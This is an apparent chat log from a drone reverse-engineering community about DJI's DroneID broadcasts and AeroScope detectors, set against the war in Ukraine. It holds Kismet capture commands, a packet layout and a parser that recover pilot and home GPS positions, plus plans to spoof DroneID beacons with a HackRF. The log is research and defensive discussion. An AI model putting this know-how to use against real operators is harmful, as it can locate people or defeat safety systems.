[2022-03-30 20:42:57] faineg : i've been buying DJI products since 2013 so i've followed the full saga, albeit not cracking it open and looking inside to the extent y'all have

[2022-03-30 20:42:59] hostile :

[2022-03-30 20:43:03] konraditurbe : @

[2022-03-30 20:43:12] konraditurbe : play store for android

[2022-03-30 20:43:31] hostile : ahhhhh my bad yeah they got kicked off at some point I think cuz sec neo

[2022-03-30 20:43:33] hostile : I forget

[2022-03-30 20:43:34] konraditurbe : You have to go to their site to get the dji fly apk

[2022-03-30 20:43:37] faineg : huh, weird

[2022-03-30 20:43:49] konraditurbe : Fuckers would rather inconvenience their customers

[2022-03-30 20:44:09] konraditurbe : had several friends who picked up mavics and minis be super confused why they had to download an apk

[2022-03-30 20:44:31] hostile : https://www.dji.com/ca/downloads/djiapp/dji-fly iirc

[2022-03-30 20:45:19] hostile : ```There is a chance that the DJI Fly app isn’t updated on the Play Store. Google announced a while back that app developers will have to ensure their apps are packaged as bundles (AAB) rather than the standard APK. According to a DroneDJ reader, DJI’s SDK has a bug that prevents it from compiling in this new AAB standard.```

[2022-03-30 20:45:24] hostile : https://dronedj.com/2021/01/27/latest-dji-fly-android-app-only-available-from-djis-website-not-the-play-store/

[2022-03-30 20:45:36] konraditurbe : Hehe, has to be old secneo

[2022-03-30 20:45:57] hostile : yeah my assumption too

[2022-03-30 20:46:36] konraditurbe : what other apps use dji's secneo implementation?

[2022-03-30 20:46:58] hostile : dji didn't implement it

[2022-03-30 20:47:06] hostile : Bangcle did. LOTS of sketchy apps and malware use it

[2022-03-30 20:47:25] hostile : hence why it is so expensive for folks like Diff to give us free time to decrypt it

[2022-03-30 20:47:41] hostile : https://www.linkedin.com/company/secneo-co-ltd/about/

[2022-03-30 20:50:35] faineg : btw regarding drone safety, this NGO specializes in giving advice to people about tech-self-defense strategies and might be good to talk to at some point about incorporating basic drone advice into their resources - https://tacticaltech.org/

[2022-03-30 20:50:55] faineg : they do good work but i don't think anyone over there knows much about drones as i recall

[2022-03-30 20:51:13] konraditurbe : wonder what secneo being HQ'd in california will mean for them and DJI in the future. https://www.shine.cn/biz/tech/2203143106/

[2022-03-30 20:52:09] konraditurbe : Oh they have an office in Beijing lol

[2022-03-30 20:57:58] hostile : lol found some older supervisor documents... seems to imply it has some ancestry with AeroScope management interface

[2022-03-30 20:58:28] hostile :

[2022-03-30 20:58:42] hostile :

[2022-03-30 20:58:55] hostile :

[2022-03-30 20:59:10] hostile :

[2022-03-30 20:59:27] hostile :

[2022-03-30 21:01:18] konraditurbe : nice find!!

[2022-03-30 21:01:55] hostile : Yup some of the wording matches. Supervisor may have been an early mix of AeroScope & Fligthhub *internally*. (my guess).

[2022-03-30 21:02:02] hostile :

[2022-03-30 21:02:28] hostile : also note the version number in that doc is 1.5.0

[2022-03-30 21:03:40] hostile : lol at the shit in the same folder as this in the AWS dump.

[2022-03-30 21:14:45] mainframe : Meanwhile I have looked more into it - and it appears that Autel Explorer app sends map center point - and it will send it again when it changes (or every ~20s if it does not change). App map center point change is triggered either by drone tracking on the map or when user is scrolling map manually. Data sent can probably linked to unique ID - which may be linked to your Autel account (also when you are not logged in atm). This part is not yet verified - but there is persistent ID - even when not logged into app.

[2022-03-30 21:26:20] konraditurbe : Yeah the ID stuff is concerning, as it can be quite invasive when the user is not logged in.

[2022-03-30 21:32:43] faineg : ugh

[2022-03-30 21:32:47] faineg : disturbing

[2022-03-30 23:06:12] hostile : guys relax! It's just marketing data to tell where the sales are hype. ;)

[2022-03-30 23:06:23] hostile : (kinda line DJI gives me when I push them in private)

[2022-03-30 23:52:41] hostile : so China is all super restrictive eh?

[2022-03-30 23:52:45] hostile :

[2022-03-30 23:53:03] hostile : make sure your Real Name and SMS are tied to your drone flights

[2022-03-31 00:16:07] hostile : lets see if DJI Pilot did it too.

[2022-03-31 00:41:56] w4ts0n : w4ts0n joined the channel.

[2022-03-31 00:45:38] dkovar : That video is highly suspect. There is a lot of UAV related disinformation coming out of Ukraine.

[2022-03-31 00:47:46] dkovar : If you want to collect sensitive information around refugee camps, build your own UAV, or have your org support an org standard one. Doesn't come with DJI baggage, you don't need most of their features, and you can do field repairs on it, and it'll cost you less money.

[2022-03-31 01:39:03] fredmicrowave : The problem with homemade drones is the video link. Available DIY systems are not encrypted, so you end up with an open feed that anyone can see, including where you take off or land...Specially if you have OSD flight data in it.

[2022-03-31 01:47:44] hostile : not a problem

[2022-03-31 01:47:59] hostile : you can get an ArtySyn dev kit just like DJI did and make your own LightBridge with ease.

[2022-03-31 01:48:22] hostile : you can also add encryption to DIY work historically HAM ops avoid it cuz they find liability in regulation

[2022-03-31 01:50:16] hostile : but yes. requires some effort and many folks are lazy or not technical enough

[2022-03-31 01:50:22] hostile : want spoon fed / hand held

[2022-03-31 01:52:10] hostile : https://github.com/rodizio1/EZ-WifiBroadcast

[2022-03-31 01:52:20] hostile : this came out years ago... completely usable

[2022-03-31 03:22:21] rflagg : rflagg joined the channel.

[2022-03-31 03:26:37] hostile : Lets fucking gooooooo!!!!!!!!!

[2022-03-31 03:26:49] hostile :

[2022-03-31 03:26:56] hostile : I'm back bitches.

[2022-03-31 04:31:41] hostile : so it looks like Kismet stop using the old KaiTai definitions and moved to a proper parser for DroneID packets.

[2022-03-31 04:31:41] hostile : so it looks like Kismet stoped using the old KaiTai definitions and moved to a proper parser for DroneID packets.

[2022-03-31 04:31:57] hostile : https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.cc

[2022-03-31 04:32:04] hostile : https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.h

[2022-03-31 04:33:32] hostile : sudo kismet -c youwifi0:channels=\"140W5,149W5,153W5,157W5,161W5\" worked for MR1SS5 the Mini SE in North America in 5ghz only mode. (5.725-5.850 GHz)

[2022-03-31 04:33:32] hostile : sudo kismet -c youwifi0:channels=\"140W5,149W5,153W5,157W5,161W5\" worked for the Mini SE in North America in 5ghz only mode.

[2022-03-31 04:35:03] hostile : sudo kismet -c youwifi0:channels=\"140W5,149W5,153W5,157W5,161W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5\" for MR1SD25 (adds 2.400-2.4835 GHz, 5.725-5.850 GHz)

[2022-03-31 04:35:46] hostile : https://www.dji.com/mini-se/specs

[2022-03-31 04:36:12] hostile :

[2022-03-31 04:37:28] hostile : Same channel set should cover the Spark

[2022-03-31 04:39:13] hostile : Also the Air

[2022-03-31 04:39:15] hostile :

[2022-03-31 04:40:57] hostile : Looks like all series will be covered by that channel set

[2022-03-31 04:40:59] hostile :

[2022-03-31 04:42:18] hostile : Using a known good QCNFA222 M2 card.

[2022-03-31 04:47:12] hostile : so to get DroneID support back in kimset, this is gonna need to be edited https://github.com/kismetwireless/kismet/blob/master/conf/kismet_uav.conf.yaml#L90

[2022-03-31 05:21:38] hostile : https://dji-rev.com/dji-rev/pl/sxn789ifyf87xr6mob8zodxkpo

[2022-03-31 05:21:48] hostile : the link still insta pops open cuz of WEP =]

[2022-03-31 06:00:30] hostile : https://dji-rev.com/dji-rev/pl/b86899noi7nxmf868tmouye6aw

[2022-03-31 06:05:39] hostile : Also I think we've got clean drone ID packets.

[2022-03-31 06:05:42] hostile :

[2022-03-31 06:18:45] hostile : https://twitter.com/d0tslash/status/1509414290922614784?s=20&t=H1ERiNiL-t4xQ7MLELWB-Q

[2022-03-31 07:21:21] hostile : here's a better view of the actual Vendor Specific IE tag

[2022-03-31 07:21:37] hostile : you can clearly see my serial number in plain text

[2022-03-31 07:22:19] hostile : the "Vendor Specific Data" is the DroneID packet that needs parsed

[2022-03-31 11:06:41] konraditurbe : https://www.forbes.com/sites/thomasbrewster/2022/03/31/dji-drones-become-vital-tool-in-ukraine-resistance/?sh=4fc73dba79e6

[2022-03-31 11:27:57] konraditurbe : As it's been said earlier, drone that snitches on you to nearby aeroscopes > no drone at all.

[2022-03-31 11:41:20] fredmicrowave : I agree it can be done relatively easily, but what I mean is that its not so easy to be done quickly, specially during a war, when you need images quickly instead of learning how to program boards you don´t have and build drones.

[2022-03-31 11:43:00] fredmicrowave : EZ wifibroadcast is really cool btw

[2022-03-31 14:15:35] skyninja : The Kismet / Anatomy of drone id doc have version 1 of the drone id packet. Newer models have version=2, that includes appGPSTime,appGPSLongitude,appGPSLatitude

[2022-03-31 14:33:45] skyninja : here is a parser in python, reads a pcap file, outputs human readable drone ids.

[2022-03-31 15:02:03] hostile : re: Capability in China, this is interesting. https://www.caac.gov.cn/en/HYYJ/NDBG/201802/P020180227616856973062.pdf

[2022-03-31 15:08:24] hostile : so is there a v3 packet that includes pilot location too?

[2022-03-31 15:08:54] tmbinc : What is this TFR thing by the way? Seems some chinese-only online NFZ system. Or is that what the diagram shows?

[2022-03-31 15:09:13] hostile : DJI app can pull TFR shit now IIRC

[2022-03-31 15:09:42] hostile : but yeah I think some of the Supervisor program got converted into FlightHub, and they used it internally for CAAC monitoring

[2022-03-31 15:10:04] hostile : so both product, and internal tool that they totally never run on volunteered flight logs

[2022-03-31 15:10:47] tmbinc : Mini2 has version=2 and includes pilot (app) location

[2022-03-31 15:11:19] tmbinc : what else would "pilot" location be?

[2022-03-31 15:26:51] hostile : home loc, current pilot loc (cell phone gps location), and drone loc

[2022-03-31 15:36:34] hostile : errrr uhhhhhh

[2022-03-31 15:36:36] hostile :

[2022-03-31 15:36:45] hostile : Note CAAC requests ability to send drones management commands.

[2022-03-31 15:37:08] hostile : and depicts a "drone performing a return operation according to the management command"

[2022-03-31 15:37:14] hostile : they remotely issue an RTH ?

[2022-03-31 15:46:02] hostile : @skyninja for some reason your script just hangs. Not sure scapy is reading the pcap properly

[2022-03-31 15:46:05] hostile : ``` $ python3 droneid.py --raw dump.pcap WARNING: No IPv4 address found on anpi1 ! WARNING: No IPv4 address found on anpi0 ! WARNING: more No IPv4 address found on en3 ! ```

[2022-03-31 15:46:05] hostile : ```$ python3 droneid.py --raw dump.pcap WARNING: No IPv4 address found on anpi1 ! WARNING: No IPv4 address found on anpi0 ! WARNING: more No IPv4 address found on en3 ! ```

[2022-03-31 15:46:39] dkovar : Or, remotely issue a "go anywhere we want"....

[2022-03-31 15:46:41] hostile : oh wait just took for ever to load

[2022-03-31 15:49:37] skyninja : by the way, same parser as for Ocusync, except the droneid packets are enclosed by a length field at the start and a CRC16 at the end.

[2022-03-31 15:51:19] hostile : values def need adjusted.

[2022-03-31 15:51:23] hostile :

[2022-03-31 15:51:41] hostile : I suspect there is a 3rd version of the packet.

[2022-03-31 15:57:35] skyninja : apsGPSLongitude looks a bit funny, but otherwise seems ok.

[2022-03-31 16:00:42] skyninja : i know what is the problem, you are in the US, and that has a negative longitude. It's a signed/unsigned thing.

[2022-03-31 16:02:58] skyninja : now with support for people in the US (-:

[2022-03-31 16:23:35] hostile : that looks better @skyninja

[2022-03-31 16:23:39] hostile :

[2022-03-31 16:25:41] hostile : that properly shows home loc, app loc, and drone loc

[2022-03-31 16:28:40] skyninja : Now everybody knows where you live (-:

[2022-03-31 16:33:39] hostile : I don't give a shit

[2022-03-31 16:33:42] hostile : it's no secret

[2022-03-31 16:33:50] hostile : google my name... address readily available

[2022-03-31 16:34:07] w0h : No one will dare to visit him when there is a swarm of kamikaze Mini SEs on the radar, not knowing which are real and which are not :D

[2022-03-31 16:34:26] hostile : like literally if someone can't dox me, they are a fucking idiot. https://www.medicalmarijuana.ohio.gov/Documents/DispensaryApplications/Southeast%203/HEALING%20III%20-%20Application%20ID-815.pdf

[2022-03-31 16:36:45] konraditurbe : suddently, parked outside hostile's house...

[2022-03-31 16:36:55] hostile : LOLOLOLOOOOLOLOLOLOLOL

[2022-03-31 16:37:01] hostile : please tweet that so I can RT

[2022-03-31 16:44:22] dkovar : Sweet.

[2022-03-31 21:54:59] hostile : @skyninja looking at your code vs old kismet code... did they remove roll, pitch, yaw, heading from the packet structure? or did you just not include it? Appears some fields were rearranged, not just appended to.

[2022-03-31 21:55:03] hostile :

[2022-03-31 22:18:56] tmbinc : I think pitch is still there but roll/yaw has been replaced with app_time (42..45), app_lon (46..49), app_lat (50..54) right?

[2022-03-31 22:19:12] tmbinc : (at least that's what I got from mini2 firmware)

[2022-03-31 22:19:39] tmbinc : sorry not sure what 40..41 actually is. Some angle but could be yaw, pitch or roll, dunno

[2022-03-31 22:19:51] hostile : I have several sets of inconsistent notes I can't recall who gave me this.

[2022-03-31 22:20:02] hostile :

[2022-03-31 22:20:30] tmbinc : app_time is only 4 bytes on mini2

[2022-03-31 22:20:46] hostile :

[2022-03-31 22:22:53] tmbinc : ok maybe I'm off here in my disassembly

[2022-03-31 22:23:19] hostile : I forget this coming from FC, or from the .ko?

[2022-03-31 22:24:04] hostile : I didn't get to decompiling the FC module we discussed yet. Wasn't interested in entrypoint games, and processor selection fuckery yet. =]

[2022-03-31 22:26:09] tmbinc : FC

[2022-03-31 23:39:41] glados : glados joined the channel.

[2022-03-31 23:49:18] hostile : I think this is the format of the changes needed for kismet

[2022-03-31 23:49:30] hostile : ``` m_version = p_io->read_u1(); m_seq = p_io->read_u2le(); m_state_info = p_io->read_u2le(); m_product_type = p_io->read_u1(); m_serialnumber = p_io->read_bytes(16); m_raw_lon = p_io->read_s4le(); m_raw_lat = p_io->read_s4le(); m_height = p_io->read_s2le(); m_altitude = p_io->read_s2le(); m_raw_app_time = p_io->read_s8le(); m_raw_app_lon = p_io->read_s4le(); m_raw_app_lat = p_io->read_s4le(); m_raw_home_lon = p_io->read_s4le(); m_raw_home_lat = p_io->read_s4le(); m_product_type = p_io->read_u1(); m_uuid_len = p_io->read_u1(); m_uuid = p_io->read_bytes(uuid_len()); ```

[2022-04-01 06:52:36] skyninja : I just did not include vnorth/veast/vup/roll/pitch/yaw. I do not use them and it difficult to test if the values are correct. Yaw would be useful, so you have a heading if you plot a drone on a map.

[2022-04-01 06:55:25] skyninja : for kismet you should have a switch on m_version. If you have version 1, do what is already implemented in kismet. If you have version 2, do the thing with appgps in it. I do not have version 1 samples, so I cannot test it. I assume the Lightbridge drones have version 1.

[2022-04-01 06:56:35] skyninja : for version 2, between your m_altitude and m_raw_app_time, there are some bytes.

[2022-04-01 07:00:49] skyninja : and for appgps lat/lon, latitude comes first, then longitude. That is different order than home and drone lat/lon. No 1 April joke.

[2022-04-01 07:00:49] skyninja : ere and for appgps lat/lon, latitude comes first, then longitude. That is different order than home and drone lat/lon. No 1 April joke.

[2022-04-01 07:02:41] skyninja : and there is no m_product_type between state and serial.

[2022-04-01 08:37:24] finnik : finnik joined the channel.

[2022-04-01 10:57:17] kon : kon joined the channel.

[2022-04-01 14:51:43] hostile : @skyninja do you know the field positions for the roll pitch yaw, even if you are not using them. I'd like all the fields mapped properly, not just to assume they are not useful to someone

[2022-04-01 15:03:36] skyninja : nope

[2022-04-01 15:19:12] hostile : we'll have to get one of the FC modules decompiled again to confirm

[2022-04-02 04:40:46] hostile : slow progress this eve.

[2022-04-02 04:40:48] hostile : https://dji-rev.com/dji-rev/pl/g35t78dh4tr13jnmz16rjeb6ia

[2022-04-02 04:40:59] hostile :

[2022-04-02 05:42:59] skyninja : what are you trying to do? transmit spoofed beacons with gr-ieee802 and a HackRF?

[2022-04-02 05:43:30] hostile : that's next...

[2022-04-02 05:43:48] hostile : then occusync variant

[2022-04-02 05:44:24] hostile : both rx / tx methods need written up. made easy to put into peoples hands that need it right now

[2022-04-02 07:34:08] hotelzululima : time for some "crybaby" devices :)

[2022-04-02 07:37:43] hotelzululima : OpenPilot for the win

[2022-04-02 08:02:32] hostile : @hotelzululima if you get bored... https://www.nxp.com/design/development-boards/i-mx-evaluation-and-development-boards/i-mx-rt1060-evaluation-kit:MIMXRT1060-EVK

[2022-04-02 16:29:38] hotelzululima : hmm ok.. just getting back into this after hibernating on this front ..I know you are directing me this way for a reason.. :) reason?(for folks like moi lacking a clue)

[2022-04-02 16:33:38] hostile : @hotelzululima https://github.com/o-gs/dji-firmware-tools/wiki/WM160-Main-Processing-Core-Board

[2022-04-02 16:33:59] hostile :

[2022-04-02 16:36:00] dkovar : One possible consequence of the "AeroScopes in Ukraine" issue and the work being done here is that DJI might consider turning on RemoteID and turning off DroneID. https://ursainc.com/2022/04/02/supporting-remoteid-offers-dji-a-simple-off-ramp-from-the-thorny-issue-of-aeroscopes-in-combat-zones/ If you are concerned that this is click bait, here is the text: "What If … DJI Replaces Their DroneID with RemoteID? Supporting RemoteID offers DJI a simple off ramp from the thorny issue of AeroScopes being used in combat zones or for unintended use cases. On September 16th, 2022 “Drone manufacturers must comply with the final (RemoteID) rule’s requirements for them.” What would happen if DJI “simply” replaced their current DroneID approach that supports AeroScope with RemoteID data … and turns off DroneID data? There is no simple “on/off” switch to do this but the process and roadmap for it seems relatively straightforward. DJI would immediately a) be compliant with RemoteID requirements, b) no longer need to support what appears to be an end of life product and c) essentially eliminate the value of all existing AeroScope units. Due to the rollout timeline and carve outs for existing drones AeroScope units will continue to provide value for awhile but that value will rapidly diminish while the value of a simple RemoteID sensor will rapidly increase. What is DJI’s incentive for continuing to support DroneID and thus AeroScope units and their capabilities? They will certainly earn good will from the CUAS integrators using AeroScope and those integrator’s clients until RemoteID is fully rolled out. On the other hand they will no longer earn ill will from those who object to DroneID. DJI drones and AeroScope units that can detect their operators became a very hot topic due to their use on both sides of the war in Ukraine. Being able to disable DroneID might offer a neat off ramp from a very thorny issue. Many of us are watching the RemoteID (and the EU version) with great interest. Anyone selling or using AeroScope units may want to factor RemoteID’s timeline into their plans and budgets."

[2022-04-02 16:59:29] hotelzululima : As I suspected.. why this and not a core board(like we used on the Mavic Pro?(shortage of core boards?))

[2022-04-02 18:43:08] skyninja : Direct remote id must be wi-fi or bluetooth. How should DJI do that for Ocusync and Lightbridge based drones? Some have also a wi-fi chip, but maybe not all. Mavic 3 already has wifi chip for this purpose.

[2022-04-02 19:13:20] fredmicrowave : Probably no one in Ukraine is going to update their drones in the short term.

[2022-04-02 20:26:49] tmbinc : If their SDR is as much SDR as they claim (and at least P1-based devices should have a freely programmable DSP for TX), then they should be able to modulate the wifi packet in software.

[2022-04-02 20:27:23] tmbinc : With Wifi chip is probably not trivial due to coexistence requirement, I wonder how they do this on Mavic 3

[2022-04-02 20:27:29] tmbinc : but of course doable

[2022-04-02 20:27:46] tmbinc : mini2 already has wifi + sdr, but only static switching

[2022-04-02 20:50:01] skyninja : I always assumed that "sdr" was a sort of product name, but they use an LTE chip for ocusync, but is not software defined at all. They had FPGA + Analog Devices RF tranceiver for the first generation of Lightbridge, but the went to an chinese ASIC for later version. I assumed that an FPGA + RF Tranceiver is too expensive for mass produced product.

[2022-04-02 20:50:01] skyninja : I always assumed that "sdr" was a sort of project name, but they use an LTE chip for ocusync, but is not software defined at all. They had FPGA + Analog Devices RF tranceiver for the first generation of Lightbridge, but the went to an chinese ASIC for later version. I assumed that an FPGA + RF Tranceiver is too expensive for mass produced product.

[2022-04-02 20:51:53] skyninja : Mavic 3: probably wi-fi soc dedicated to transmitting drone id??

[2022-04-02 20:52:56] skyninja : For your DIY drone you can use an ESP32 soc for transmitting drone id.

[2022-04-02 21:06:35] hostile : "chinese ASIC" aka Artosyn for LightBridge

[2022-04-02 21:08:09] hostile : @skyninja photo of what Mavic 3 uses here: https://dji-rev.com/dji-rev/pl/4niihxg8eigntdp8rzxmxrum6r

[2022-04-02 21:09:44] skyninja : yes that picture yes.

[2022-04-02 21:30:57] fredmicrowave : If so, would be so easy to disable drone id on M3 by just disconnecting the antennas connectors...

[2022-04-03 06:55:36] skyninja : from the teardown videos i do not see a obvious antenna cable being disconnect. i do not know. haven't verified myself that this is a wifi module.

[2022-04-03 13:27:04] fredmicrowave : It´s hard to see on the video, but the antennas could be printed on the PCB, on each side of the module. There is enough of what looks like unpopulated pcb left for that, which would be unusual if it had no purpose.

[2022-04-03 13:35:25] fredmicrowave : I have found another video, definitively printed antennas ! : https://www.youtube.com/watch?v=ixM7qB0NGkc&t=150s Since it is on top, could also be ADS-B receiver I suppose.

[2022-04-03 13:35:25] fredmicrowave : I have found another video, definitively printed antennas ! : https://www.youtube.com/watch?v=ixM7qB0NGkc&t=150s Since it is on top, could also be ADB receiver I suppose.

[2022-04-03 13:36:17] fredmicrowave : At around 2:30

[2022-04-03 13:42:26] fredmicrowave : It´s hard to tell since there is no scale for comparison, but those antennas look larger than usual wifi ones. Since freq is 1090 vs Wifi 2400, that is probably the ads-b RX ...

[2022-04-03 13:48:59] fredmicrowave : There are also two more antennas on the upper shell that connect to the GPS board, but I doubt they are GPS.

[2022-04-03 13:59:51] tmbinc : Those are ADS-B I think?

[2022-04-03 14:01:53] tmbinc : ADS-B receiver is near the GPS typically (at least on Air2/Air2S it was)

[2022-04-03 14:02:10] tmbinc : The first photo looks like bluetooth/wifi (does it have BT? Don't know)

[2022-04-03 14:08:12] tmbinc : BTW if anyone is interested in ADS-B firmware, I recently discovered the key for it.

[2022-04-03 14:47:29] hostile : Imma start calling you the damn keymasta

[2022-04-03 14:53:36] skyninja : dank keymasta

[2022-04-03 14:54:58] skyninja : (i do not know what "dank" means, not a native speaker, it is probably slang, but you say it all the time)

[2022-04-03 14:56:08] skyninja : ads-b sound logical, because those signals, like gps, come from above and this on top.

[2022-04-03 15:01:43] ronykom : ronykom joined the channel.

[2022-04-03 15:02:14] hostile : mix between these two @skyninja

[2022-04-03 15:02:15] hostile :

[2022-04-03 15:02:30] hostile :

[2022-04-03 15:02:53] hostile : @tmbinc's keys are indeed dank. Potent and of the highest quality. =]

[2022-04-03 15:04:50] hostile : or Cheese... fine cheese can also be dank. You look at it, it is moldy, smells like shit, but you know it is the finest of quality cheese, literally because of that dank smell. It is an interesting word!

[2022-04-03 15:05:16] hostile : it implies both nasty, and high quality at the same time. Quite confusing for someone to consider something nasty to be the highest of quality.

[2022-04-03 15:05:53] hostile : *potent* is perhaps the best word encompassing it all.

[2022-04-03 15:12:47] skyninja : thanks for the language lesson, i learn something every day ?

[2022-04-03 15:57:21] stanlee : https://www.youtube.com/watch?v=UZXzMUxfR6c

[2022-04-03 16:00:45] hostile :

[2022-04-03 16:01:34] hostile : this video has been shown over and over and over, but has a date of 2016. It may indeed show the dangers of EW groups and signal intelligence, but it is not conclusive in any way related to Aeroscope, or DroneID broadcasts

[2022-04-03 16:21:28] the_lord : probably the date and time are incorrect, in September 2016 the MP was not released yet

[2022-04-03 16:22:43] stanlee : Understood

[2022-04-03 17:09:11] hostile : that said, I've had several folks reach out in private begging for help claiming .ru had integrated aeroscope logic into their shelling / strike capability.

[2022-04-03 17:21:57] skyninja : "integrated" is most likely the swivel chair interface ?

[2022-04-03 17:38:51] the_lord : I had to disassemble brand new M3 to take these pictures ?

[2022-04-03 17:42:12] skyninja : https://www.youtube.com/watch?v=mT5FKNQ2Fg8

[2022-04-03 17:43:54] skyninja : @the_lord the background proves it are recent pictures (-:

[2022-04-03 17:46:07] the_lord : ;)

[2022-04-03 17:47:09] the_lord : ?

[2022-04-03 17:48:44] the_lord : the GPS antenna is too thin, maybe for that it takes long time to get GPS fix

[2022-04-03 17:49:33] the_lord :

[2022-04-03 17:49:42] the_lord : About 2mm

[2022-04-03 17:56:02] hostile : ground plane will get ya too.

[2022-04-03 17:56:22] hostile : notorious fail in ublox board design by rookies. (like 3dr)

[2022-04-03 17:57:23] hostile : https://blog.antenova.com/ground-plane-design-for-gnss-trackers

[2022-04-03 17:58:29] hostile : shit we knew back in 2015

[2022-04-03 17:58:30] hostile : https://diydrones.com/profiles/blogs/u-blox-m8n-ground-planes-antennas-and-positional-accuracy

[2022-04-03 17:58:41] hostile : ``` A larger ground plane results in higher accuracies. ```

[2022-04-03 17:59:37] hostile : god I remember 3dr was soooo bad. you could clearly see it in testing.

[2022-04-03 17:59:39] hostile :

[2022-04-03 17:59:53] hostile : looks like a fucking octopus running across the slides

[2022-04-03 18:09:10] the_lord : I think I’ll replace the antenna with MP one and compare

[2022-04-03 19:12:33] the_lord : A quick test showed its faster than stock, need to compare with stock drone at same location and time the 3D fix

[2022-04-03 21:19:02] fredmicrowave : Great pictures @the_lord . The antenna is thin but look large. (They say last firmware helped a lot for faster gps fix.) Good to know that the side antennas are for ADS-B, so the module could be Wifi ... a bit strange if its for droneid to place it on top, but they may had no other place left.

[2022-04-03 21:26:02] the_lord : the module IS WiFI, its written on the cable the WiFi is not only for droneID, it is used for quick transfer as well

[2022-04-03 21:27:47] fredmicrowave : Lol, Ok i missed that.

[2022-04-04 01:28:49] dkovar : Not sure how this might be useful, but apparently AeroScope is known as "Cloud Whistle" in China - https://inf.news/en/world/78c9615387a7515da0c37e72321cb2b2.html (See paragraph under first picture.)

[2022-04-04 01:57:32] hostile : things are happening.

[2022-04-04 01:59:02] hostile : @dkovar weird... ```cloud whistle fixed equipment```

[2022-04-04 01:59:21] hostile :

[2022-04-04 02:03:01] hostile : ```云哨```

[2022-04-04 02:09:06] hostile : If anyone has an enhanced Wifi Drone and capability to test Kismet (with a 5mhz capable wifi card)

[2022-04-04 02:09:15] hostile : DroneID: Add DJI home/app locations to UI, fix home display, update https://github.com/kismetwireless/kismet/commit/8a31283dfafb7b085ecb7766256b43d661a9f7ca

[2022-04-04 02:23:31] hostile : these aeroscope antenna arrays get out of hand!

[2022-04-04 02:23:39] hostile :

[2022-04-04 02:23:44] hostile : https://dl.djicdn.com/downloads/AEROSCOPE/20180525/AEROSCOPE_Directional_Antenna_G-16_CH.pdf

[2022-04-04 05:39:53] skyninja : For the G16 you need 4 Aeroscopes.

[2022-04-04 06:42:53] skyninja : i do not understand its use, because i'd guess line of sight is the bottleneck, not antenna gain.

[2022-04-04 06:45:02] the_lord : I agree with you, but in open areas it will cover huge distances good for very early warning

[2022-04-04 07:53:18] skyninja : my strategy would be four aeroscope with G8 antenna geographically dispersed.

[2022-04-04 10:21:01] argonaut : argonaut joined the channel.

[2022-04-04 12:20:56] dkovar : Generally your first priority is height for your antenna but gain still matters. I'd do well dispersed G8s but, depending on your use case, a honkin' single G16 could do the trick.

[2022-04-04 13:31:26] stanlee : You think that they f'd the ground plane? I thought they are using the same ublox chip as the Air2S, etc and they have no GPS issues?

[2022-04-04 13:33:22] hostile : I mean they are using WEP for a c2 link... this is par for the course lol

[2022-04-04 14:02:41] fredmicrowave : This antenna array must be so directional that if you fly at its vertical you may remain undetected :smile:

[2022-04-05 01:36:17] skarzhevsky : skarzhevsky joined the channel.

[2022-04-05 01:38:38] skarzhevsky : Hi @hostile !

[2022-04-05 02:36:24] hostile : is there any updated version of this document? https://dl.djicdn.com/downloads/AEROSCOPE/20180525/Aeroscope_SDK_Linux_User_Guide_EN.pdf

[2022-04-05 03:15:48] skarzhevsky : Hi @hostile. Most likely this video was sent to you by my friends. We do have a problem with DJI drones. Our military received a lot of DJI equipment. Although the video is old, but the problem really exists. Our guys could not have made a more recent video of their positions being shelled after the drone was launched. While the Russian troops were near Kiev, our troops had to turn off the GPS on the controller, launch the DJI drones from one place and immediately run away from the launch point. Because for 2 minutes the launch site was under mortar fire. We had information that the Russians were using aeroscopes against our drone pilots. To somehow bypass the DroneID we need an update from DJI, which will disable the sending of DronIDs. As a variant, my suggestion was to simply spoof the droneid to create a lot of decoys for the aeroscope. This would make it possible to partially neutralize enemy aeroscopes. Or software shutdown of droneids, but for this I need to root drones (what is not clear for Mavic 2). At the moment I have several drones for experiments: - DJI Mavic Pro - DJI Mavic 2 Enterprise Advanced Also, our military promised to bring me an aeroscope to check the solutions, if it turns out to deceive the aeroscope or make it work incorrectly. If you have any ideas, solutions, thoughts, please share them. In turn, I can: - test it on various equipment - turn into a turnkey solution for the military - distribute this decision I'm also looking for any simple/cheap and accessible solutions for detecting enemy drones. The solution should notify our troops of the presence of drones above them. So far I have sketches based on hackrf.

[2022-04-05 03:17:49] hostile : "the problem really exists" this I'm aware of for sure! Just folks directly attributing the video to Aeroscope without more proof has been a touchy discussion. I'm working to liberate what I can DroneID wise. I assume you saw this addition to Kismet. This should be useful for EnhancedWifi DJI drone. https://github.com/kismetwireless/kismet/commit/8a31283dfafb7b085ecb7766256b43d661a9f7ca

[2022-04-05 03:26:52] hostile : but this problem with Aeroscope and your safety is one of the main reasons I came out of retirement from drone work. I feel DJI is being less than honest about their ability to disable droneID to help your people. I also have noted they claimed droneID is "encrypted" so only "good guys" can use it. These things do not sit well with me. I've gotten many requests to help with spoofers and sniffers.

[2022-04-05 03:28:34] hostile : Right now I'm aware several folks hackRF scripts for receiving Occusync DroneID, but they are still held in private. If I can't talk someone into liberating the .grc I'll be working with @Icer to create an open source one everyone can see and use. My plan is basically to make AeroScope unusable until DJI does something about it.

[2022-04-05 03:31:44] skarzhevsky : I'll try to assemble it today and test it. Half a year ago, the kismet drone detector did not work for DJI. Also, data exchange between the remote control and the drone can occur at offset frequencies that do not match the WiFi channels.

[2022-04-05 03:32:50] hostile : Kismet only works for with specific wifi card, and kismet settings.

[2022-04-05 03:33:09] hostile : a known working Atheros ath9k is Atheros QCNFA222 AR5BWB222 you also MUST change the channel list: source=wlan0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"

[2022-04-05 03:33:52] hostile :

[2022-04-05 03:34:14] hostile : very few cards work, MUST be M.2 version, no USB works due to driver limitations.

[2022-04-05 03:34:53] hostile : only works for "Enhanced Wifi" drones, Spark, Mavic Air, Mavic Mini, Mini SE.

[2022-04-05 03:35:16] skarzhevsky : Can physical access to the aeroscope help? I don’t know if the military will let me take it apart, but I can think of something.

[2022-04-05 03:35:40] hostile : not specifically in this case. Won't be very useful.

